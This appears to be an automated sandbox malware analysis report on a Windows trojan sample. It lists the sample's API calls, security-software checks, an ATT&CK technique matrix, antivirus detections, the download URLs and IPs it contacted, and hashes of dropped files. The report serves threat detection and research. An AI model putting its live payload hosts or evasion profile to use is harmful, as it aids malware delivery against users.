Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,15_2_100010CA
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C674615 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,7_3_6C674615
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_00426020 GetVersionExW,14_2_00426020
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmpBinary or memory string: kxetray.exe
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmpBinary or memory string: 360safe.exe
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_10051470 htons,bind,WSAGetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,_CxxThrowException,14_2_10051470
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_10048BF0 socket,htons,bind,WSAGetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,_CxxThrowException,getsockname,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,_CxxThrowException,htons,listen,WSAGetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,_CxxThrowException,14_2_10048BF0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_10051470 htons,bind,WSAGetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,_CxxThrowException,15_2_10051470
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_10048BF0 socket,htons,bind,WSAGetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,_CxxThrowException,getsockname,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,_CxxThrowException,htons,listen,WSAGetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,_CxxThrowException,15_2_10048BF0
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 21 Obfuscated Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | 1 Credential API Hooking | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | Logon Script (Windows) | 12 Process Injection | 11 Software Packing | Security Account Manager | 245 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Timestomp | NTDS | 541 Security Software Discovery | Distributed Component Object Model | Input Capture | 4 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 13 Virtualization/Sandbox Evasion | SSH | Keylogging | 15 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 12 Masquerading | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 13 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 1 Remote System Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
[Behavior graph (image not reproduced): Behavior Graph ID: 1550312, Sample: VZ7xFmeuPX.exe, Startdate: 06/11/2024, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label | Link
VZ7xFmeuPX.exe | 79% | ReversingLabs | Win32.Trojan.Kelios |
VZ7xFmeuPX.exe | 100% | Avira | TR/Kryptik.ianbq |
VZ7xFmeuPX.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe | 100% | Avira | TR/Kryptik.ianbq |
C:\Users\user\Desktop\AntiCheat.dll | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe | 24% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\download\XLBugHandler.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\download\atl71.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\download\download_engine.dll | 5% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\download\minizip.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\download\zlib1.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\xldl.dll | 2% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\zlibwapi.dll | 0% | ReversingLabs | |
C:\Users\user\Desktop\AntiCheat.dll | 62% | ReversingLabs | Win32.PUA.Packunwan |
C:\Users\user\Desktop\ExuiKrnln_Win32.lib | 3% | ReversingLabs | |
C:\Users\user\Desktop\ExuiKrnln_Win64.lib | 0% | ReversingLabs | |
C:\Users\user\Desktop\api-ms-win-crt-heap-l1-1-0.dll | 0% | ReversingLabs | |
C:\Users\user\Desktop\api-ms-win-crt-math-l1-1-0.dll | 0% | ReversingLabs | |
C:\Users\user\Desktop\api-ms-win-crt-runtime-l1-1-0.dll | 0% | ReversingLabs | |
C:\Users\user\Desktop\api-ms-win-crt-stdio-l1-1-0.dll | 0% | ReversingLabs | |
C:\Users\user\Desktop\api-ms-win-crt-string-l1-1-0.dll | 0% | ReversingLabs | |
C:\Users\user\Desktop\concrt140.dll | 0% | ReversingLabs | |
C:\Users\user\Desktop\msvcp140.dll | 0% | ReversingLabs | |
C:\Users\user\Desktop\msvcp140_atomic_wait.dll | 0% | ReversingLabs | |
C:\Users\user\Desktop\msvcp140_codecvt_ids.dll | 0% | ReversingLabs | |
C:\Users\user\Desktop\vcruntime140.dll | 0% | ReversingLabs | |
No Antivirus matches
No Antivirus matches
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://download6.mcloud.139.comMiniThunderPlatform.exe, 0000000F.00000003.1675363991.000000000C6E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://download6.mcloud.139.com/storageWeb/servletMiniThunderPlatform.exe, 0000000F.00000002.1724450109.000000000C670000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://nginx.org/r/error_logMiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000003.1722484573.000000000C66C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722583922.000000000C66F000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722683050.000000000C67C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722646058.000000000C674000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.winimage.com/zLibDll-1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, minizip.dll.7.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://download6.mcloud.139.com:443/storageWeb/servlet/downloadServlet?code=TTIxRDExcUFxWUsyZUE2ODQMiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000003.1722484573.000000000C66C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722583922.000000000C66F000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1723141682.000000000C670000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722815289.000000000C66A000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722839677.000000000C66F000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1724450109.000000000C670000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://crl.thawte.com/ThawteTimestampingCA.crl01B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, download_engine.dll.7.dr, XLBugHandler.dll.7.dr, MiniThunderPlatform.exe.7.drfalse
                                                                    high
                                                                    http://www.openssl.org/support/faq.html....................MiniThunderPlatform.exe, 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1725202157.0000000010001000.00000040.00000001.01000000.00000014.sdmpfalse
                                                                      high
                                                                      http://csc3-2010-aia.verisigMiniThunderPlatform.exe, 0000000E.00000003.1545516600.00000000007F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://store.paycenter.uc.cnMiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000002.1723428878.0000000000448000.00000040.00000001.01000000.0000000F.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webmMMiniThunderPlatform.exe, 0000000E.00000002.1617881554.000000000C8F6000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.winimage.com/zLibDllminizip.dll.7.drfalse
                                                                        high
                                                                        http://skinx.x1.lolgezi.cc/d/PanAlist139Yun/SLBox/%E8%B5%84%E6%BA%90%E4%BF%AE%E5%A4%8D%E5%8C%85_2410MiniThunderPlatform.exe, 0000000F.00000003.1722646058.000000000C674000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1723825853.0000000000862000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://logo.verisign.cMiniThunderPlatform.exe, 0000000E.00000002.1614649879.00000000007F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webm12MiniThunderPlatform.exe, 0000000E.00000002.1617881554.000000000C8F6000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://ocsp.verMiniThunderPlatform.exe, 0000000E.00000002.1614649879.00000000007F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webmaMiniThunderPlatform.exe, 0000000E.00000002.1617881554.000000000C8F6000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://skinx.x1.lolgezi.cc/d/PanAlist139Yun/SLBox/MiniThunderPlatform.exe, 0000000F.00000003.1722484573.000000000C66C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722583922.000000000C66F000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722683050.000000000C67C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722646058.000000000C674000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1724293363.0000000000BF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1550312
Start date and time: 2024-11-06 16:39:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 13m 53s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: VZ7xFmeuPX.exe
renamed because original name is a hash value
Original Sample Name: 327722aa946d64bcf5d584723dc62e9c88f4b2d8801f5576100e6d77d7b212ac.exe
Detection: MAL
Classification: mal100.evad.winEXE@10/37@45/15
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 63%
• Number of executed functions: 133
• Number of non-executed functions: 261
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, PID 7512 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: VZ7xFmeuPX.exe
Time | Type | Description
10:40:17 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
10:40:46 | API Interceptor | 127622x Sleep call for process: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe modified
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          CHINA169-BACKBONECHINAUNICOMChina169BackboneCNyakuza.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 120.3.142.176
                                                                                                          2rI5YEg7uo.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 221.128.225.57
                                                                                                          yakuza.sh.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 221.192.39.39
                                                                                                          yakuza.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 60.28.46.65
                                                                                                          yakuza.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 222.163.96.248
                                                                                                          yakuza.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 180.95.227.68
                                                                                                          h0r0zx00x.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 112.229.131.26
                                                                                                          h0r0zx00x.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 112.224.210.216
                                                                                                          IGz.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                          • 110.18.182.233
                                                                                                          nuklear.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                          • 175.22.26.196
                                                                                                          CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdyakuza.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 47.100.110.189
                                                                                                          yakuza.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 114.55.106.216
                                                                                                          yakuza.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 47.127.226.90
                                                                                                          h0r0zx00x.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 139.252.21.14
                                                                                                          x86_32.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                          • 47.106.94.203
                                                                                                          m68k.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                          • 8.159.102.65
                                                                                                          arm7.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                          • 8.155.218.241
                                                                                                          sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                          • 47.107.186.85
                                                                                                          ppc.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                          • 8.191.75.250
                                                                                                          ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 47.99.12.72
                                                                                                          CHINA169-BACKBONECHINAUNICOMChina169BackboneCNyakuza.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 120.3.142.176
                                                                                                          2rI5YEg7uo.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 221.128.225.57
                                                                                                          yakuza.sh.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 221.192.39.39
                                                                                                          yakuza.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 60.28.46.65
                                                                                                          yakuza.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 222.163.96.248
                                                                                                          yakuza.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 180.95.227.68
                                                                                                          h0r0zx00x.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 112.229.131.26
                                                                                                          h0r0zx00x.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 112.224.210.216
                                                                                                          IGz.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                          • 110.18.182.233
                                                                                                          nuklear.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                          • 175.22.26.196
                                                                                                          CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdyakuza.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 47.100.110.189
                                                                                                          yakuza.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 114.55.106.216
                                                                                                          yakuza.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 47.127.226.90
                                                                                                          h0r0zx00x.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 139.252.21.14
                                                                                                          x86_32.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                          • 47.106.94.203
                                                                                                          m68k.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                          • 8.159.102.65
                                                                                                          arm7.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                          • 8.155.218.241
                                                                                                          sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                          • 47.107.186.85
                                                                                                          ppc.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                          • 8.191.75.250
                                                                                                          ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 47.99.12.72
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          fc54e0d16d9764783542f0146a98b300n3ydjVzUYm.exeGet hashmaliciousCryptOne, VidarBrowse
                                                                                                          • 113.200.1.7
                                                                                                          • 36.138.50.131
                                                                                                          J8igWzSKUw.exeGet hashmaliciousDCRatBrowse
                                                                                                          • 113.200.1.7
                                                                                                          • 36.138.50.131
                                                                                                          6K1uYM85lS.exeGet hashmaliciousPhorpiexBrowse
                                                                                                          • 113.200.1.7
                                                                                                          • 36.138.50.131
                                                                                                          2oK.exeGet hashmaliciousDCRatBrowse
                                                                                                          • 113.200.1.7
                                                                                                          • 36.138.50.131
                                                                                                          EYBfU.exeGet hashmaliciousDCRatBrowse
                                                                                                          • 113.200.1.7
                                                                                                          • 36.138.50.131
                                                                                                          KK63Cn92dU.exeGet hashmaliciousPhonk Miner, XmrigBrowse
                                                                                                          • 113.200.1.7
                                                                                                          • 36.138.50.131
                                                                                                          Yhx3rg6GE4.exeGet hashmaliciousPhonk Miner, Xmrig, zgRATBrowse
                                                                                                          • 113.200.1.7
                                                                                                          • 36.138.50.131
                                                                                                          G3KugQ8kiX.exeGet hashmaliciousPhonk Miner, Xmrig, zgRATBrowse
                                                                                                          • 113.200.1.7
                                                                                                          • 36.138.50.131
                                                                                                          K92v0CujUu.exeGet hashmaliciousParallax RAT, Phonk Miner, XmrigBrowse
                                                                                                          • 113.200.1.7
                                                                                                          • 36.138.50.131
                                                                                                          yD4vgUNMMb.exeGet hashmaliciousParallax RAT, Phonk Miner, Xmrig, zgRATBrowse
                                                                                                          • 113.200.1.7
                                                                                                          • 36.138.50.131
                                                                                                          37f463bf4616ecd445d4a1937da06e192ULrUoVwTx.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                          • 113.200.1.7
                                                                                                          wmKmOQ868z.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                          • 113.200.1.7
                                                                                                          wmKmOQ868z.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                          • 113.200.1.7
                                                                                                          2ULrUoVwTx.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                          • 113.200.1.7
                                                                                                          p7cCXP3hDz.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                          • 113.200.1.7
                                                                                                          Anfrage_244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                          • 113.200.1.7
                                                                                                          fIwP4c7xYt.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 113.200.1.7
                                                                                                          6b94X7dMrG.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 113.200.1.7
                                                                                                          0hNX6q4DZ0.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 113.200.1.7
                                                                                                          3Pd480eWHA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 113.200.1.7
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\download\atl71.dll
• Safe#U8868#U683cejw665.exe | malicious | GhostRat, Mimikatz, Nitol
• k3yYC4F6nT.exe | malicious | Unknown
• u6yUxgTEN3.exe | malicious | Unknown
• FA3TCAsA9E.exe | malicious | Unknown
• fNbViAxRGL.exe | malicious | Unknown
• dXaqC8H6qX.exe | malicious | Unknown
• DGSetup_3054BZ73_20191125.exe | malicious | Unknown
• SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe | malicious | Unknown
• SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe | malicious | Unknown
• SecuriteInfo.com.LresultFromObject.32334.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\download\XLBugHandler.dll
• k3yYC4F6nT.exe | malicious | Unknown
• u6yUxgTEN3.exe | malicious | Unknown
• FA3TCAsA9E.exe | malicious | Unknown
• fNbViAxRGL.exe | malicious | Unknown
• dXaqC8H6qX.exe | malicious | Unknown
• DGSetup_3054BZ73_20191125.exe | malicious | Unknown
• SecuriteInfo.com.LresultFromObject.32334.exe | malicious | Unknown
                                                                                                                                            Process:C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):315734
                                                                                                                                            Entropy (8bit):7.154012118939693
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:rLtgTsoZTfDb9QKpyPDWslKFDpxx8HRQePaLQyzdw:98fTfDqPDWslKtpxx8HRvPakyBw
                                                                                                                                            MD5:F3F333EC8A61E54235B80241B00F4578
                                                                                                                                            SHA1:847A936D7FF4CF9B79BA35C471690FE474111D59
                                                                                                                                            SHA-256:B5B3CDEC933F26A91DAA1B5E2F75B6D0BCD4520E59BD9D92A34E040CD9E7C719
                                                                                                                                            SHA-512:30612364616BDCC593DA625D47E72FDDDA0243464F2CD8EAB50D5EA494A9E2DB1FBE5040F13C322F0BD8E5B3F39FE400787B5A205B8799186BD65DD3CE8786F3
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Process:C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5941360
                                                                                                                                            Entropy (8bit):7.945140834790053
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:98304:3CPHr8ODf4bJvYZzIVggz3HQDoowRvA6NNUfDhoG7Dph7H1/l02xP1WUYcXHDuxF:3Cvrvf4FwZUrk3qADfeG3pp1t02xP19e
                                                                                                                                            MD5:BFB790CA20B4B1BE024290B90FAE4B4B
                                                                                                                                            SHA1:AE1877D2421678B480034F9020AB4C5B78035D36
                                                                                                                                            SHA-256:B813FA689216AA8B5F19880AB0200AABE4250EA5353F86B797ED7AF98C027A2B
                                                                                                                                            SHA-512:4560CB7F99791936305A3100C7A56A76B46296F6AC965CD751B9C4342E526EE0128204B86DDCBBC20DBA310EE1A6CC9E9837D2291942CB595BD3DB2761EF5022
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Process:C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4366
                                                                                                                                            Entropy (8bit):7.9502280737981
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:iEO/EPup008uvITp1rjQpJLQlvzn+JTP1sYWZQtRYXqAenlLfXUJ:iE8Np0YQ1mHZU+OXqBl7XUJ
                                                                                                                                            MD5:7F2DCB3B174F26BB2F16BE737EEA4A84
                                                                                                                                            SHA1:4686494AD3EE98F65C49D3E2A1AC5C499B7CC164
                                                                                                                                            SHA-256:FD1B79516054CB33495D30032E35C834C29C5BCD210DDF9159189D83A5DD9EEB
                                                                                                                                            SHA-512:0610D2A9724CA83637DF902D7137956C567DF1CC74C905A0A3205DF7AEF0198396BCFBBD2150B2A91A29495826A4D2EA332FA42C27A565CFA9A31648C99827EF
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):173
                                                                                                                                            Entropy (8bit):4.4050343683880415
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:+AlVNmgihHRWDh5NXcVdVTumEmPUAXX2J7g3liVvWQcd9YTQVVsreqwcyn:+iFiBR0FcVXCmEwFX2OA9WFk0geqxy
                                                                                                                                            MD5:3D310A04D607755228F6F9945A655B22
                                                                                                                                            SHA1:CF949936C264961C9C2076F7B0EB2D31F2988FF8
                                                                                                                                            SHA-256:221B2612B953B75C4B9862C3F5CF0C28BA90291FD269BBBF66FEA619F21216BF
                                                                                                                                            SHA-512:812B0EFB1F78A15DC9C9E4C39FE0D3F0EA80F8902B8EB6770311666C8E47E93B4680D68A041E3B2D97CD20A27929B1D184470FACA6297FB0A64C2156A5C81EBD
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
